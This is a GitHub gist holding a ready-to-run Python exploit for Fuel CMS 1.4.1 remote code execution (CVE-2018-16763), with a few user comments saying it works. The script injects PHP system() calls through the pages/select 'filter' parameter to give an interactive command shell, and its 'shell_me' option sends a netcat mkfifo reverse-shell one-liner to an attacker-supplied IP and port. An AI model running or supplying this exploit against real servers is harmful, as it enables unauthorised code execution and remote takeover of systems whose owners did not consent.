Created
October 29, 2021 07:06
-
-
Save anir0y/8529960c18e212948b0e40ed1fb18d6d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution | |
# Date: 2019-07-19 | |
# Exploit Author: 0xd0ff9 | |
# Vendor Homepage: https://www.getfuelcms.com/ | |
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 | |
# Version: <= 1.4.1 | |
# Tested on: Ubuntu - Apache2 - php5 | |
# CVE : CVE-2018-16763 | |
# | |
# Poc Created by Ac1d (assassin) | |
import requests | |
import sys | |
import urllib | |
from requests.sessions import extract_cookies_to_jar | |
class col: | |
HEADER = '\033[95m' | |
BLUE = '\033[94m' | |
CYAN = '\033[96m' | |
GREEN = '\033[92m' | |
WARNING = '\033[93m' | |
FAIL = '\033[91m' | |
RESET = '\033[0m' | |
BLACK = "\033[0;30m" | |
RED = "\033[0;31m" | |
GREEN = "\033[0;32m" | |
BROWN = "\033[0;33m" | |
BLUE = "\033[0;34m" | |
PURPLE = "\033[0;35m" | |
LIGHT_GRAY = "\033[0;37m" | |
DARK_GRAY = "\033[1;30m" | |
LIGHT_RED = "\033[1;31m" | |
LIGHT_GREEN = "\033[1;32m" | |
YELLOW = "\033[1;33m" | |
LIGHT_BLUE = "\033[1;34m" | |
LIGHT_PURPLE = "\033[1;35m" | |
LIGHT_CYAN = "\033[1;36m" | |
LIGHT_WHITE = "\033[1;37m" | |
BOLD = "\033[1m" | |
FAINT = "\033[2m" | |
ITALIC = "\033[3m" | |
UNDERLINE = "\033[4m" | |
BLINK = "\033[5m" | |
NEGATIVE = "\033[7m" | |
CROSSED = "\033[9m" | |
def banner(): | |
banner = r""" | |
______ _ _____ ___ ___ _____ | |
| ___| | / __ \| \/ |/ ___| | |
| |_ _ _ ___| | / \/| . . |\ `--. | |
| _| | | |/ _ \ | | | |\/| | `--. \ | |
| | | |_| | __/ | \__/\| | | |/\__/ / | |
\_| \__,_|\___|_|\____/\_| |_/\____/ | |
Tested on 1.4 | |
""" | |
banner += "Created by Ac1d" | |
return col.LIGHT_BLUE + banner + col.RESET | |
def help(): | |
banner = col.LIGHT_WHITE + "\n\tMenu\n" | |
banner += col.LIGHT_GREEN | |
banner += "\nexit -\tExit app" | |
banner += "\nshell_me -\tGet a reverse shell (netcat) " | |
banner += "\nhelp -\tShow this help\n"+ col.RESET | |
return banner | |
print(banner()) | |
print(help()) | |
#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27 | |
if len(sys.argv) != 2: | |
print("\nUsage: python3 exploit.py Vulnerable IPADDRESS") | |
sys.exit(0) | |
IP=sys.argv[1] | |
def parsePage(page): | |
try: | |
page = page.split("<h4>A PHP Error was encountered</h4>")[0] | |
page = page.split("<div")[0] | |
page = page[6:] | |
return page | |
except: | |
return False | |
try: | |
while True: | |
cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET) | |
if cmd[0:4].lower() == "exit": | |
print(col.RED + "Exiting..." + col.RESET) | |
sys.exit(0) | |
if cmd[0:8] == "shell_me": | |
IP2, PORT = input(col.LIGHT_BLUE + "Enter your attacking machine IP:PORT $ " + col.RESET).split(":") | |
nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f" | |
cmd = nc | |
print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET) | |
if cmd[0:4] == "help": | |
print(help()) | |
continue | |
if not "/tmp/f;mkfifo" in cmd: | |
print(col.LIGHT_GRAY + "Sending request." + col.RESET) | |
cmd = urllib.parse.quote(cmd) | |
r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27") | |
if r.status_code == 200: | |
page = parsePage(r.text) | |
if page == "\n": | |
print(col.RED + "No result" + col.RESET) | |
continue | |
print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET) | |
except Exception as e: | |
print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET) |
Glad to hear that, cheers !!!
awesome happy hacking
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thank you Sir, it works well for me